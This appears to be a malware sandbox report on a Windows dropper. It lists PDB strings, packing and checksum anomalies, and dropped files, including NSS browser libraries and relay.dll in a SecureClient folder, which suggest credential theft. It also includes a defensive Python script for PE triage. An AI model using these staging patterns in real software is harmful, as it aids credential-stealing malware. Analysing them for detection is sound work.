Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000003.00000002.2170329966.000000006C827000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 00000016.00000002.2733109861.000000006C7D7000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296044980.0000021731FB0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3243326923.0000021717B30000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3243326923.0000021717B30000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3289012458.0000021731C70000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3289012458.0000021731C70000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: wntdll.pdbUGP source: run.exe, 00000003.00000002.2169721590.0000000004A01000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000003.00000002.2169460946.0000000004550000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000003.00000002.2169111990.00000000041F6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613691350.0000000004D68000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613947415.0000000005240000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000016.00000002.2706144763.000000000410D000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000016.00000002.2703363636.00000000039F1000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000016.00000002.2705188750.0000000003D50000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2871966588.000000000517A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873741315.0000000005650000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.000002172935C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3319355291.0000021738BD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: P[<_C:\sedoh\56\sizagabucusa xayipo\8-rinuhololoz\nuzunum dor.pdb source: sx8RE6LbG0.exe, 00000000.00000003.2019130046.0000000003701000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000000.2018347583.0000000000412000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: I[L<C:\jizafova\bugu-44_jikeg_37\kisusilogeguw\rawubexuh.pdb source: sx8RE6LbG0.exe
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: nss3.pdb source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\sedoh\56\sizagabucusa xayipo\8-rinuhololoz\nuzunum dor.pdb source: sx8RE6LbG0.exe, 00000000.00000003.2019130046.0000000003701000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000000.2018347583.0000000000412000.00000002.00000001.01000000.00000005.sdmp
Source: sx8RE6LbG0.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: sx8RE6LbG0.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: sx8RE6LbG0.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: sx8RE6LbG0.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: sx8RE6LbG0.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Unpacked PE file: 2.2.u2ts.0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Unpacked PE file: 0.2.sx8RE6LbG0.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Unpacked PE file: 2.2.u2ts.0.exe.400000.0.unpack
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21731ea0000.9.raw.unpack, LHMFCLLKPJPNLPEMOOMPKGFGGJLDMBDEHOHN.cs .Net Code: Type.GetTypeFromHandle(JJNAIKHKCKDDPOIGLAJBAGMGGMHCALFHCLGE.LNDLDDEEPFKHJPPDGFFJPKNBBHJGABJMBCCA(16777510)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(JJNAIKHKCKDDPOIGLAJBAGMGGMHCALFHCLGE.LNDLDDEEPFKHJPPDGFFJPKNBBHJGABJMBCCA(16777270)),Type.GetTypeFromHandle(JJNAIKHKCKDDPOIGLAJBAGMGGMHCALFHCLGE.LNDLDDEEPFKHJPPDGFFJPKNBBHJGABJMBCCA(16777349))})
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_00416240
Source: relay.dll.0.dr Static PE information: real checksum: 0x18dd31 should be: 0x1877ea
Source: relay.dll.3.dr Static PE information: real checksum: 0x18dd31 should be: 0x1877ea
Source: sx8RE6LbG0.exe Static PE information: real checksum: 0x7dd33 should be: 0x7dd36
Source: dvffdl.4.dr Static PE information: real checksum: 0x0 should be: 0xc411c
Source: u2ts.3.exe.0.dr Static PE information: section name: .didata
Source: freebl3.dll.2.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.2.dr Static PE information: section name: .00cfg
Source: mozglue.dll.2.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.2.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.2.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.2.dr Static PE information: section name: .didat
Source: nss3.dll.2.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.2.dr Static PE information: section name: .00cfg
Source: softokn3.dll.2.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.2.dr Static PE information: section name: .00cfg
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0042786C push ecx; ret 0_2_0042787C
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0042780C push eax; ret 0_2_0042782A
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0042E3A5 push esi; ret 0_2_0042E3AE
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_00409D06 push ecx; ret 0_2_00409D19
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_004097B6 push ecx; ret 0_2_004097C9
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_01CE9120 push ecx; iretd 0_2_01CE9126
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_01CEA939 pushad ; retf 0_2_01CEA940
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_01CE808B pushad ; retf 0_2_01CE808C
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_01CEAF49 push 00000061h; retf 0_2_01CEAF51
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_01CEA623 push 2B991403h; ret 0_2_01CEA62A
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_03691B72 push dword ptr [esp+ecx-75h]; iretd 0_2_03691B76
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0368C3FF push esp; retf 0_2_0368C407
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_03697A73 push eax; ret 0_2_03697A91
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_03679A1D push ecx; ret 0_2_03679A30
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_03697AD3 push ecx; ret 0_2_03697AE3
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0368C9FD push esp; retf 0_2_0368C9FE
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_03679F6D push ecx; ret 0_2_03679F80
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_004176C5 push ecx; ret 2_2_004176D8
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_0020281F push esp; retn 0039h 3_2_00202820
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_00201088 push esp; retn 0039h 3_2_00201089
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_0035FAB6 push ecx; ret 3_2_0035FAC9
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_0035FB55 push ecx; ret 3_2_0035FB68
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_00201DA3 push esp; retn 0039h 3_2_00201DA4
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_00210F0B push 8B003CD1h; retf 3_2_00210F10
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_001FEF7F push esp; retf 0039h 3_2_001FEF80
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_001FEFA7 push eax; retf 0039h 3_2_001FEFA8
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_6C8047D9 push ecx; ret 3_2_6C8047EC
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_6C806365 push ecx; ret 3_2_6C806378
Source: dvffdl.4.dr Static PE information: section name: .text entropy: 6.816444465715168
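The three static signals listed above (a PE checksum that does not match the header, a .text section whose rights change from ER to EW after unpacking, and a high-entropy section) can be reproduced without the sandbox. The following is an added example, not part of the report or of any of the tools it names: it implements the image checksum algorithm, decodes section rights in the report's E/R/W notation, and computes per-section Shannon entropy, then runs the checks on a constructed one-section PE32 image. The 6.5 entropy threshold and the `build_sample_pe` helper are assumptions for illustration.

```python
"""Static triage checks mirrored from the report: header checksum mismatch,
W+X section rights and per-section entropy, run on a constructed PE image."""
import math
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
OPT_HDR_CHECKSUM = 64        # CheckSum field offset inside the optional header (PE32 and PE32+)
ENTROPY_THRESHOLD = 6.5      # assumed cut-off for "probably packed or encrypted"


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Image checksum as imagehlp computes it: 32-bit sum with end-around carry over
    the whole file, skipping the CheckSum dword, folded to 16 bits, plus file length."""
    padded = data + b"\x00" * ((4 - len(data) % 4) % 4)
    skip = (checksum_offset // 4) * 4
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue                     # the field being computed counts as zero
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def checksum_field_offset(data: bytes) -> int:
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 + 20 + OPT_HDR_CHECKSUM   # PE signature + COFF header + field


def checksum_status(data: bytes):
    """(stored, computed): the pair behind the report's 'real checksum: X should be: Y'."""
    off = checksum_field_offset(data)
    return struct.unpack_from("<I", data, off)[0], pe_checksum(data, off)


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def section_rights(characteristics: int) -> str:
    """Section flags in the report's notation: E, R, W."""
    return ("E" if characteristics & IMAGE_SCN_MEM_EXECUTE else "") + \
           ("R" if characteristics & IMAGE_SCN_MEM_READ else "") + \
           ("W" if characteristics & IMAGE_SCN_MEM_WRITE else "")


def sections(data: bytes):
    """List of (name, rights, entropy) read from the section table."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size
    out = []
    for i in range(nsec):
        hdr = table + 40 * i
        name = data[hdr:hdr + 8].rstrip(b"\x00").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", data, hdr + 16)
        flags = struct.unpack_from("<I", data, hdr + 36)[0]
        out.append((name, section_rights(flags), shannon_entropy(data[raw_ptr:raw_ptr + raw_size])))
    return out


def suspicious(data: bytes):
    """Findings in the same wording the report uses."""
    findings = []
    stored, computed = checksum_status(data)
    if stored != computed:
        findings.append(f"real checksum: {stored:#x} should be: {computed:#x}")
    for name, rights, ent in sections(data):
        if "E" in rights and "W" in rights:
            findings.append(f"section {name} is writable and executable ({rights})")
        if ent > ENTROPY_THRESHOLD:
            findings.append(f"section {name} entropy: {ent:.2f}")
    return findings


def build_sample_pe(text_flags: int, text_bytes: bytes, stored_checksum: int = 0) -> bytes:
    """Constructed one-section PE32 image (illustration only, not a file from the report)."""
    e_lfanew, opt_size = 0x40, 0xE0
    raw_ptr = e_lfanew + 24 + opt_size + 40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = b"PE\x00\x00" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                      # PE32 magic
    struct.pack_into("<I", opt, OPT_HDR_CHECKSUM, stored_checksum)
    sec = struct.pack("<8sIIIIIIHHI", b".text", len(text_bytes), 0x1000, len(text_bytes),
                      raw_ptr, 0, 0, 0, 0, text_flags)
    return dos + coff + bytes(opt) + sec + text_bytes


if __name__ == "__main__":
    packed = build_sample_pe(IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | 0x20,
                             bytes(range(256)) * 4)
    for f in suspicious(packed):
        print(f)
```

A stored checksum of 0 (as on `dvffdl` above) is the usual signature of a file that was never run through the linker's or signtool's checksum fix-up; a non-zero mismatch, as on `relay.dll` and the sample itself, means the header was patched after linking. Neither is proof of malice on its own, which is why the report lists them under data obfuscation rather than as a detection.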
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe File created: C:\Users\user\AppData\Local\Temp\u2ts.0.exe
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe File created: C:\Users\user\AppData\Roaming\SecureClient\relay.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe File created: C:\Users\user\AppData\Local\Temp\u2ts.3.exe
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe File created: C:\Users\user\AppData\Local\Temp\u2ts.2\relay.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe File created: C:\Users\user\AppData\Local\Temp\u2ts.2\UIxMarketPlugin.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe File created: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\dvffdl
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe File created: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\jipsoiol
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
